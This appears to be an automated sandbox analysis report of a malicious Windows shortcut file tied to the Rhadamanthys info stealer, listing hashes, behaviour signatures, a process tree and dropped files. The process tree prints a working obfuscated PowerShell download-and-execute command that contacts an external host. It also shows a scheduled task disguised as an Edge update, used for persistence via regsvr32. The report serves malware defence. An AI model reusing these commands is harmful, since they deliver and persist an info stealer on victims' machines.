Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-10-2024 18:51

General

  • Target

    5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848.lnk

  • Size

    1KB

  • MD5

    ae44dfe179f7ab8400c90b2d208ff313

  • SHA1

    7f87bfe1edeccd7a01ff20519e92ba54e7d8e4a8

  • SHA256

    5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848

  • SHA512

    5b451ef8b7043300bd9809285f8f283f2bda096d06f80560e48c89e5992981f0b5de20ed8a3fcdf3e8ff5e4be5672791a713e68a39571d25683db02f5720922a

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1h982d.bemostake.space/test.txt

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2520
      • C:\Windows\system32\openwith.exe
        "C:\Windows\system32\openwith.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2076
    • C:\Windows\system32\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848.lnk
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4236
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c p""ow""er""s""h""ell/""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3304
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
          3⤵
          • Blocklisted process makes network request
          • Deletes itself
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2364
          • C:\Users\Public\ajbs50ul.bat
            "C:\Users\Public\ajbs50ul.bat"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:816
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\Admin\AppData/Roaming/KIM8.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C84C80C-C4C8-44C0-8C40-80C4084C4808}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3552
            • C:\Windows\system32\regsvr32.exe
              "regsvr32" /s /i:INSTALL C:\Users\Admin\AppData/Roaming/KIM8.ini
              5⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3352
          • C:\Users\Admin\AppData\Local\Temp\utox_x86_x64.exe
            "C:\Users\Admin\AppData\Local\Temp\utox_x86_x64.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:2380
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x4b0 0x150
      1⤵
        PID:3392
      • C:\Windows\system32\regsvr32.EXE
        C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\Admin\AppData/Roaming/KIM8.ini
        1⤵
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:3460
      • C:\Windows\system32\regsvr32.EXE
        C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\Admin\AppData/Roaming/KIM8.ini
        1⤵
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:2232

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        556084f2c6d459c116a69d6fedcc4105

        SHA1

        633e89b9a1e77942d822d14de6708430a3944dbc

        SHA256

        88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

        SHA512

        0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\regsvr32.EXE.log

        Filesize

        434B

        MD5

        55cd82f1f37f86716011f6271ae32817

        SHA1

        c9206205ef4c787cf9fa55456dbfd29de3d685b5

        SHA256

        c66fe4787c6333e4e0759b3f041fea3c5abff4cebe577679308b5d09e284bc4f

        SHA512

        aa2a89420e046f0415bfbd4f88ba337c0b667da3a45c7968e80d463adbc583921cc32127d9b3a709d7040e78c82a913ee00f6195487c2020b6f178a6629d9a8c

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        0c77ce1db08e7f1b2bc9896a13b4f7a5

        SHA1

        3de7b852f908b16834f9484bce8eebd4d7389ec1

        SHA256

        dcb3cb7065cee59e6f4e62405ef4c5418a04a35a1ac04db0b846851bc7ec967f

        SHA512

        5244fa2ce993c07dfbbeac86360c2e49e86c0957a016624251e917223b0d1c0afd5fefdf17b397b298c194b5699c8696dd7e59f379d6eae98665be361f077b29

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ufik5sf4.rak.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\utox_x86_x64.exe

        Filesize

        4.7MB

        MD5

        e9679980aa73cfc7cf00f3da7949c661

        SHA1

        53ba9e3a3a10ae0e72df4b3632d8d4135eb540b6

        SHA256

        d7bd224b2ef0014c679046c917becfface5f5aba2fbdb7dd3c17fe964c3cee97

        SHA512

        002aac023e1bbe3bbbf153ebc5462970aa98c84badea6bc1b8d333c98a5ed91540928b8848a9928607e12c0a1296a12424b2c2b0753e23afeb537249f04db8bc

      • C:\Users\Admin\AppData\Roaming\KIM8.ini

        Filesize

        1.0MB

        MD5

        60a55b1d8e739216cadd3e31d7412f03

        SHA1

        8b5c284796a1efa1df8a3eddd27070d374e1cc54

        SHA256

        be86e0357748f3b4fa166342f284800a83c955c2c8b197475c2450613a6eed67

        SHA512

        c06cb2b86f7a9de5243f4395fb40fa88a7669f3e427d427afb95801de447beb8f616847890ae12cfc6060ec7215ceb370cd61b5cf0395eab81312121060dc7ab

      • C:\Users\Public\ajbs50ul.bat

        Filesize

        2.2MB

        MD5

        8837df25aabc4fad85e851aca192f714

        SHA1

        c4fbd38356b7ee16eaf21deb83170bbcb0fe566a

        SHA256

        741cee2c6f6f8ee8a54923fa2a0c88085cede35bdc2e95b1b9f1800e894e6c19

        SHA512

        93f712ae3ca726b090df270feb1421ea98778260b7fe309e06ac3887b396d3dc8ab41655ec7d15a57cac8b467cca0395a52ef965765a26c9597f6512fdad88e2

      • memory/816-195-0x00007FF7F5740000-0x00007FF7F5922000-memory.dmp

        Filesize

        1.9MB

      • memory/2076-196-0x00007FFCBF990000-0x00007FFCBFB85000-memory.dmp

        Filesize

        2.0MB

      • memory/2076-192-0x0000020A40A60000-0x0000020A40E60000-memory.dmp

        Filesize

        4.0MB

      • memory/2076-198-0x00007FFCBD0E0000-0x00007FFCBD3A9000-memory.dmp

        Filesize

        2.8MB

      • memory/2076-197-0x00007FFCBDB70000-0x00007FFCBDC2E000-memory.dmp

        Filesize

        760KB

      • memory/2076-187-0x0000020A3EFA0000-0x0000020A3EFAA000-memory.dmp

        Filesize

        40KB

      • memory/2232-224-0x000000001B270000-0x000000001B670000-memory.dmp

        Filesize

        4.0MB

      • memory/2232-222-0x0000000002650000-0x0000000002660000-memory.dmp

        Filesize

        64KB

      • memory/2364-12-0x00007FFCA13A0000-0x00007FFCA1E61000-memory.dmp

        Filesize

        10.8MB

      • memory/2364-1-0x000001C41B840000-0x000001C41B862000-memory.dmp

        Filesize

        136KB

      • memory/2364-168-0x00007FFCA13A0000-0x00007FFCA1E61000-memory.dmp

        Filesize

        10.8MB

      • memory/2364-0-0x00007FFCA13A3000-0x00007FFCA13A5000-memory.dmp

        Filesize

        8KB

      • memory/2364-11-0x00007FFCA13A0000-0x00007FFCA1E61000-memory.dmp

        Filesize

        10.8MB

      • memory/2380-202-0x0000000000400000-0x000000000097B000-memory.dmp

        Filesize

        5.5MB

      • memory/2380-200-0x0000000000400000-0x000000000097B000-memory.dmp

        Filesize

        5.5MB

      • memory/2380-204-0x0000000000400000-0x000000000097B000-memory.dmp

        Filesize

        5.5MB

      • memory/2380-203-0x0000000000400000-0x000000000097B000-memory.dmp

        Filesize

        5.5MB

      • memory/2380-201-0x0000000000400000-0x000000000097B000-memory.dmp

        Filesize

        5.5MB

      • memory/3352-182-0x000000001B4D0000-0x000000001B8D0000-memory.dmp

        Filesize

        4.0MB

      • memory/3352-183-0x000000001B4D0000-0x000000001B8D0000-memory.dmp

        Filesize

        4.0MB

      • memory/3352-185-0x00007FFCBDB70000-0x00007FFCBDC2E000-memory.dmp

        Filesize

        760KB

      • memory/3352-184-0x00007FFCBF990000-0x00007FFCBFB85000-memory.dmp

        Filesize

        2.0MB

      • memory/3352-186-0x00007FFCBD0E0000-0x00007FFCBD3A9000-memory.dmp

        Filesize

        2.8MB

      • memory/3352-181-0x000000001B2C0000-0x000000001B2D0000-memory.dmp

        Filesize

        64KB

      • memory/3352-180-0x000000001B2B0000-0x000000001B2B8000-memory.dmp

        Filesize

        32KB

      • memory/3352-179-0x000000001B1C0000-0x000000001B270000-memory.dmp

        Filesize

        704KB

      • memory/3460-210-0x00000000034D0000-0x00000000034E0000-memory.dmp

        Filesize

        64KB

      • memory/3460-212-0x000000001BD80000-0x000000001C180000-memory.dmp

        Filesize

        4.0MB